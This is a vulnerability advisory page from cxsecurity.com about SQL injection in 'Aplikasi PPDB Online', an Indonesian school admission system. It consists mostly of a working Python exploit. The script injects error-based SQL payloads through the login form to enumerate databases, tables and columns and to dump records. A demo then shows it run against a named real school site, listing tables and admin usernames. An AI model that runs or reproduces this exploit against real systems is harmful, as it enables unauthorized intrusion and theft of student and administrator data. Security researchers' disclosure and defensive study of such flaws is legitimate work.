Aplikasi PPDB Online - SQL-Injection Vulnerability

2021.01.30
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-89

import requests from os import system as c from bs4 import BeautifulSoup s = requests.session() c('clear') u = input('URL Target: ') database = {"username":"' and extractvalue(0x0a,concat(0x0a,(select database())))#","password":"1","btnlogin":""} db = s.post(u, data=database) if 'XPATH syntax error' in db.text: pass elif 'captcha' in db.text: print(f'AKSES DIBLOKIR OLEH CAPTCHA') exit() else: print(f'TERJADI SEBUAH KESALAHAN') db_soup = BeautifulSoup(db.text, 'lxml') db_grab = db_soup.find_all('p')[1].text[22:100] db_dump = db_grab.replace("'", "") print(f'''[*] Database: {db_dump} ''') print('[*] Count TB: ') count = 0 while (count < 1000): tables = {"username":"' and extractvalue(0x0a,concat(0x0a,(select table_name from information_schema.tables where table_schema=database() limit " + str(count) + ",1)))#","password":"1","btnlogin":""} tb = s.post(u, data=tables) if 'line' in tb.text: break else: pass tb_soup = BeautifulSoup(tb.text, 'lxml') tb_grab = tb_soup.find_all('p')[1].text[22:100] tb_dump = tb_grab.replace("'", "") print(f''' [{count}]. {tb_dump}''') count = count + 1 tb_dump = input('\n[*] Pilih TB: ') count = 0 while (count < 1000): columns = {"username":"' /*!and*/ extractvalue(0x0a,concat(0x0a,(select column_name from information_schema.columns where table_schema=database() and table_name='" + tb_dump + "' limit " + str(count) + ",1)))#","password":"1","btnlogin":""} cl = s.post(u, data=columns) if 'line' in cl.text: break else: pass cl_soup = BeautifulSoup(cl.text, 'lxml') cl_grab = cl_soup.find_all('p')[1].text[22:100] cl_dump = cl_grab.replace("'", "") print(f''' [{count}]. {cl_dump}''') count = count + 1 cl_dump = input('\n[*] Pilih CL: ') count = 0 while (count < 1000): dumpdata = {"username":"' /*!and*/ (select 1 from (Select count(*),Concat((select concat(" + cl_dump + ") from " + tb_dump + " limit " + str(count) + ",1),0x3a,floor(rand(0)*2))y from information_schema.tables group by y) x)#","password":"1","btnlogin":""} dd = s.post(u, data=dumpdata) dd_soup = BeautifulSoup(dd.text, 'lxml') dd_grab = dd_soup.find_all('p')[1].text[17:100] dd_dump = dd_grab.replace(":1' for key 'group_key'", "") print(f''' [{count}]. {dd_dump}''') count = count + 1 ####################-( DEMO )-#################### # URL Target: http://ppdb.mtsn1ponorogo.sch.id/panel_admin/log_in # [*] Database: # u6251098_sekolah_psb # # [*] Count TB: # [0]. tbl_web # [1]. tbl_verifikasi # [2]. tbl_user # [3]. tbl_pengumuman # [4]. tbl_pdd # [5]. tbl_siswa # [6]. tbl_pekerjaan # [7]. tbl_rapor # [8]. tbl_penghasilan # # [*] Pilih TB: tbl_user # [0]. id_user # [1]. username # [2]. password # [3]. nama_lengkap # [4]. level # [5]. tgl_daftar # # [*] Pilih CL: username # [0]. admin # [1]. adminppdb


Vote for this issue:
100%
0%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2021, cxsecurity.com

 

Back to Top